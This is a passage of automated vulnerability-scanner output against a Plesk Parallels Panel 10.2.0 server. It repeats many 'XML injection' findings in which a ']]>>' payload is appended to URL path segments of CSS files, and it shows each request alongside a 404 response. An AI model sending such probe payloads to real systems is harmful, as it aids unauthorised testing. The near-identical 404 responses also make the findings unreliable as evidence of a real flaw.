HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/ie.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/common]]>>/ie.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:25 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/ie.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/common/ie.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:27 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/content-only.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/css/customer/content-only.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:18 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/content-only.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/css/customer/content-only.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:20 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/content-only.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css]]>>/customer/content-only.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/content-only.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/customer]]>>/content-only.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:24 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/content-only.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/customer/content-only.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:26 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/custom.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/css/customer/custom.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:28 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/custom.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/css/customer/custom.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:34 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/custom.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css]]>>/customer/custom.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:41 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/custom.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/customer]]>>/custom.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:47 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/custom.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/customer/custom.css]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:54 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/main.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/css/customer/main.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:28 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/main.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/css/customer/main.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:34 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/main.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css]]>>/customer/main.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:41 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/main.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/customer]]>>/main.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:47 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/customer/main.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/customer/main.css]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:54 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/general.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/general.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:04 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/general.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/general.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:06 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/general.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/general.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:08 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/general.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/general.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:10 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/general.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/general.css]]>>?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:12 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/ie.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
